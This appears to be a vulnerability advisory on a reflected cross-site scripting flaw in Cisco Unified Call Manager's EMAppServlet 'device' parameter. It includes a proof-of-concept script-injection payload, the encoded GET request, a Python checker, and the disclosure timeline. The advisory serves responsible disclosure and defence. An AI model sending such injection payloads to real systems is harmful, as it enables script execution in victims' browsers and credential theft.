Reflected Cross-Site Scripting in Cisco Unified Call Manager

Title

Reflected Cross-Site Scripting

Product

Cisco Unified Call Manager

Vulnerable Version

12.5(1), 12.5(1.10000.22)

Fixed Version

-

CVE Number

-

Impact

low

Found

31.10.2022

By

Stefan Michlits, Werner Schober (Office Vienna) | SEC Consult Vulnerability Lab

The Cisco Unified Call Manager (CUCM) application contains a reflected cross-site scripting vulnerability. The vulnerability can potentially be used to change the contents of the displayed site, redirect to other sites or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.

Vendor description

"Consolidate your communications infrastructure and enable your people and teams to communicate simply with the Cisco Unified Communications Manager. The solution features IP telephony, high-definition video, unified messaging, Instant Message and Presence."

"Regional, family run business or global mega-brand? Choose a solution that scales as your organization's needs change. Cisco Unified Communications Manager supports the needs of small and midsize businesses through to the largest enterprises with up to 80,000 users."

"Cisco Unified (CM) supports the latest authentication, encryption, and communication protocols. It complies with key industry certifications, and secures data and communications for customers in financial services, manufacturing, retail, and government across the globe."

Source: https://www.cisco.com/c/en/us/products/unified-communications/unified-communications-manager-callmanager/index.html#~features


Business recommendation

SEC Consult recommends Cisco customers to install the latest updates and review the vendor's security note for further information.
Furthermore, an in-depth security analysis performed by security professionals is highly advised, as the software may be affected by other security issues.


Vulnerability overview/description

1) Reflected Cross-Site Scripting

The parameter "device" at the endpoint "/emapp/EMAppServlet" is vulnerable to reflected XSS. If an attacker can lure a user into clicking a crafted link (no authentication required), the attacker could potentially execute arbitrary JavaScript code in the user's browser. The vulnerability can be used to change the contents of the displayed site, redirect to other sites or steal user credentials. Additionally, users are potential victims of browser exploits and JavaScript malware.

In addition, an unusual behavior was identified: browsers cannot render the response of the endpoint "/emapp/EMAppServlet" because client-side XML parsing fails. An XML declaration must be the very first thing in a document, but the server prepends several empty lines, so the declaration only appears on line 10 of the response. The parser therefore aborts before it reaches the reflected content, which is consistent with the vendor's assessment (see the timeline below) that the issue is not exploitable under the tested circumstances. Should the server stop emitting the leading newlines, or should the response be consumed by a more lenient parser, the reflected payload would again be parsed as an XHTML script element.

Proof of concept

1) Reflected Cross-Site Scripting

To verify this vulnerability, it is sufficient to insert the following text into the parameter "device":

</URL>%0d%0a<script xmlns="http://www.w3.org/1999/xhtml">alert(document.location)</script><URL>

The following GET request can be sent to the server, containing the encoded payload in the vulnerable parameter "device". Prior authentication is not required:

/emapp/EMAppServlet?device=%3c/URL%3e%0d%0a%3cscript%20xmlns%3d%22http://www.w3.org/1999/xhtml%22%3ealert%28document.location%29%3c/script%3e%3cURL%3e
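The following script is an added example and not part of the original advisory or of Cisco's code. It builds the PoC URL above, and then models the two server behaviors described in this advisory with a constructed stand-in for the servlet's XML response (the root element name "response" and the use of a single "URL" element are assumptions; only the "URL" element name is supported by the payload). analyze_response() checks a body the way an XML-parsing browser would: whether the XML declaration is at the very start, whether the document is well-formed, and whether an XHTML-namespaced script element ended up inside it. This lets one verify the reflection, reproduce the "declaration not at line 1" failure, and confirm that XML entity escaping of the "device" value removes the injection.

```python
"""Reflected XSS check for an XML response, modelled on the EMAppServlet
"device" parameter. render_response() is a CONSTRUCTED stand-in for the
server, not Cisco's code: it reproduces the behaviours the advisory
describes (unescaped reflection inside a <URL> element and stray newlines
before the XML declaration) so the checks can be exercised offline."""
from urllib.parse import quote
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

XHTML_NS = "http://www.w3.org/1999/xhtml"
ENDPOINT = "/emapp/EMAppServlet"

# Payload from the advisory: close the surrounding <URL> element, inject an
# XHTML-namespaced <script>, then reopen <URL> so the document stays well-formed.
PAYLOAD = ('</URL>\r\n<script xmlns="%s">alert(document.location)</script><URL>'
           % XHTML_NS)


def build_poc_url(base, payload=PAYLOAD):
    """URL-encode the payload into the vulnerable "device" parameter."""
    return "%s%s?device=%s" % (base.rstrip("/"), ENDPOINT, quote(payload, safe="/"))


def render_response(device, escaped=False, leading_newlines=0):
    """Constructed model of the server's XML response (element names assumed).

    escaped=False reflects the parameter verbatim (the vulnerable behaviour);
    escaped=True applies XML entity escaping (the fix). leading_newlines models
    the stray newlines the advisory observed before the XML declaration.
    """
    value = escape(device) if escaped else device
    return ("\n" * leading_newlines
            + '<?xml version="1.0" encoding="UTF-8"?>\n'
            + "<response><URL>" + value + "</URL></response>")


def analyze_response(body):
    """Classify a response the way an XML-parsing browser would see it."""
    result = {"prolog_at_start": body.startswith("<?xml"),
              "well_formed": False, "xhtml_scripts": 0}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        # Anything before <?xml ...?> (e.g. the stray newlines) is fatal:
        # expat reports "XML or text declaration not at start of entity".
        return result
    result["well_formed"] = True
    result["xhtml_scripts"] = sum(1 for _ in root.iter("{%s}script" % XHTML_NS))
    return result


def is_exploitable(body):
    """True only if a browser would parse the body and find the injected script."""
    r = analyze_response(body)
    return r["prolog_at_start"] and r["well_formed"] and r["xhtml_scripts"] > 0


if __name__ == "__main__":
    # Host name is a placeholder; point it at a test system you are authorised to assess.
    print(build_poc_url("https://cucm.example.invalid"))
    cases = [("vulnerable, clean prolog", {}),
             ("vulnerable, 9 leading newlines", {"leading_newlines": 9}),
             ("escaped output", {"escaped": True})]
    for label, kwargs in cases:
        body = render_response(PAYLOAD, **kwargs)
        print("%-32s -> %s  exploitable=%s"
              % (label, analyze_response(body), is_exploitable(body)))
```

Against a live system, replace render_response() with the body of the real HTTP response: a result with prolog_at_start False reproduces the rendering failure described above, while prolog_at_start True together with xhtml_scripts greater than zero means the reflection is directly exploitable in the browser.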

Vulnerable / tested versions

The issue was found in Cisco Unified Call Manager version 12.5.1.

Vendor contact timeline

2022-11-10 Contacting vendor through psirt@cisco.com.
2022-11-10 Vendor requests more information; SEC Consult offers to provide it.
2022-11-11 Due to the holidays, the vendor asks to move the disclosure date from the end of December to January. SEC Consult confirms.
2022-12-05 Vendor confirms the issue but states that it is not exploitable under current circumstances. A security note regarding hardening is planned for 11th January.
2023-01-11 Vendor releases security note.
2023-03-06 Release of security advisory.

Solution

Further information can be found within the vendor's security note:
https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwd56126

Workaround

None

Advisory URL

https://sec-consult.com/vulnerability-lab/

EOF Stefan Michlits, Werner Schober / @2023
